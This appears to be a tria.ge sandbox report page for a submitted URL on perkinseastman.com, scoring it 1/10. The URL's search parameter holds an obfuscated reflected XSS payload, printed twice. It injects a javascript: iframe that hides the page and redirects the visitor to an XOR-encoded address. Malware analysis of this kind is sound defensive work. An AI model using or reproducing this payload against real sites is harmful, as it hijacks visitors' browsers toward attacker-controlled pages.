Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
https://perkinseastman.com/?s=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C78%2C75%2C94%2C75%2C94%2C88%2C75%2C67%2C70%2C4%2C82%2C83%2C80%2C5%2C24%2C31%2C98%2C123%2C104%2C112%2C121%2C104%2C5%2C29%2C104%2C112%2C27%2C121%2C122%2C19%2C126%2C5%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3EEgwzCs%28a%3A%3C9M~%3DN%5CdXg-P%5EH%3Cimg%20src%3D%2200%23gKp%3D%23k%405%7C%23Wgh%21Bovh71il%29_%7CJPc0Y-f7%5CG%3DzN%3F41Eq%214%2B%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22P%21j%23~V~%7C%24rQ%26seCaz%25%3A%3A%24Lks%3D%22%3EVcy%3FR%3E.G1sX19Mfhv%25k9%C3%97L%2BBeBBkKXb%3E~%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C78%2C75%2C94%2C75%2C94%2C88%2C75%2C67%2C70%2C4%2C82%2C83%2C80%2C5%2C24%2C31%2C98%2C123%2C104%2C112%2C121%2C104%2C5%2C29%2C104%2C112%2C27%2C121%2C122%2C19%2C126%2C5%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu
-
Sample
240521-knlwcafb6y
Malware Config
Targets
-
-
Target
https://perkinseastman.com/?s=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C78%2C75%2C94%2C75%2C94%2C88%2C75%2C67%2C70%2C4%2C82%2C83%2C80%2C5%2C24%2C31%2C98%2C123%2C104%2C112%2C121%2C104%2C5%2C29%2C104%2C112%2C27%2C121%2C122%2C19%2C126%2C5%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3EEgwzCs%28a%3A%3C9M~%3DN%5CdXg-P%5EH%3Cimg%20src%3D%2200%23gKp%3D%23k%405%7C%23Wgh%21Bovh71il%29_%7CJPc0Y-f7%5CG%3DzN%3F41Eq%214%2B%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22P%21j%23~V~%7C%24rQ%26seCaz%25%3A%3A%24Lks%3D%22%3EVcy%3FR%3E.G1sX19Mfhv%25k9%C3%97L%2BBeBBkKXb%3E~%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C78%2C75%2C94%2C75%2C94%2C88%2C75%2C67%2C70%2C4%2C82%2C83%2C80%2C5%2C24%2C31%2C98%2C123%2C104%2C112%2C121%2C104%2C5%2C29%2C104%2C112%2C27%2C121%2C122%2C19%2C126%2C5%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu
Score1/10 -